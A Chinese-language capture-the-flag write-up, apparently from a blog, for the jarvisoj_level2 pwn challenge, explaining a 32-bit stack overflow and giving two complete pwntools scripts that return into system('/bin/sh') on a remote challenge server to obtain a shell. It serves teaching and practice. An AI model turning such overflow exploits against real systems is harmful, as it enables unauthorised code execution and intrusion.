当前位置:网站首页>jarvisoj_level2
jarvisoj_level2
2022-07-23 23:28:00 【长街395】
一、查看文件
我们可以看到是32位,几乎没有开保护。
二、IDA反编译
我们拖到IDA中看看代码:
main函数中提到了一个 vulnerable_function();
我们看看这个函数 vulnerable_function():
显然是有栈溢出漏洞的。
既然有调用system函数,肯定是可以直接call一波的,只是还缺一个参数,我们看到了read函数心里不禁笑嘻嘻…
然而稍安勿躁,心存侥幸的看一波string:
妈耶~善良的出题人
代码
这里有两种方法
(1)
from pwn import*
from LibcSearcher import *
r=remote("node4.buuoj.cn",26046)
syad=0x08048320 #system函数的位置
shad=0x0804a024 #/bin/sh的位置
p=b"a"*(0x88+0x04)+p32(syad)+p32(0)+p32(shad)#其中p32(0) 是执行system函数后的存储地址,可以找个合适的值替换。
r.recvuntil(b"Input:\n")
r.sendline(p)
r.interactive()
(2)
from pwn import*
from LibcSearcher import *
r=remote("node4.buuoj.cn",26046)
#syad=0x08048320
shad=0x0804a024 #/bin/sh 的位置
#0x0804849e 是call system函数的位置 只需后面加上/bin/sh 位置即可直接执行 不用再加一个地址作为存储
p=b"a"*(0x88+0x04)+p32(0x0804849e)+p32(shad)
r.recvuntil(b"Input:\n")
r.sendline(p)
r.interactive()
总结
要先看函数结构,在去看栈结构,system和/bin/sh的位置很重要。
边栏推荐
- Analysis of video capability and future development trend based on NVR Technology
- Basic operations of AutoCAD
- Brief analysis of compiling principle of.Net CLR R2R
- [audio and video technology] video quality evaluation MSU vqmt & Netflix vmaf
- Introduction to mysqlbinlog command (remote pull binlog)
- Tap series article 9 | application development accelerator
- How does the easynvr platform turn off anonymous login?
- 【音视频技术】视频质量评价 MSU VQMT & Netflix vmaf
- Redis集群搭建(Cluster 集群模式,分片集群)
- Lin Zhiying's injury is relatively stable
猜你喜欢
TAP 系列文章9 | 应用开发加速器
What is the difference between go run, go build and go install
Baidu editor uploads pictures and sets custom directories
Remember an experience of being cheated by the Internet
疑似未系安全带 林志颖伤势相对稳定
![[laser principle and Application-8]: EMC design of laser circuit](/img/98/8b7a4fc3f9ef9b7e16c63a8c225b02.png)
[laser principle and Application-8]: EMC design of laser circuit
The role of physical layer, link layer, network layer, transport layer and application layer of tcp/ip model of internet protocol stack
Mobile, telecom and Unicom: fancy solution of 5g to B
Tap series article 7 | easy to manage pipeline configuration
A deserialized CTF question sharing
随机推荐
Getting started database Days1
SOLIDWORK learning notes: Sketch geometric relationships and editing
Arrayslist and sequence table -- Simulation Implementation
Mongodb - Introduction to the use of $exists and the combination of $ne, $nin, $nor, $not in query statements
YOLOv4: Optimal Speed and Accuracy of Object Detection
Esp8266 nodemcu - get real-time weather from Suning API
Preparation for raspberry pie 3B serial port login
[leetcode ladder] the penultimate node in the 022 linked list
Lu Xia action | Source Kai Digital: Existing Mode or open source innovation?
【Error】TypeError: expected str, bytes or os. PathLike object, not int
Finding all paths between two points in a directed graph
Classification model - logistic regression, Fisher linear discriminant (SPSS)
BGP basic experiment
Chinese NFT? NFR was born
Upgrade unity visual studio 2019 to 2022 (throw away pirated red slag)
Can Intel NUC replace the host_ It's finally perfect! The latest Intel NUC Mini host comes online
What are the three-party payment companies?
Wechat applet implements a global event bus by itself
[web vulnerability exploration] SQL injection vulnerability
Learning MySQL is enough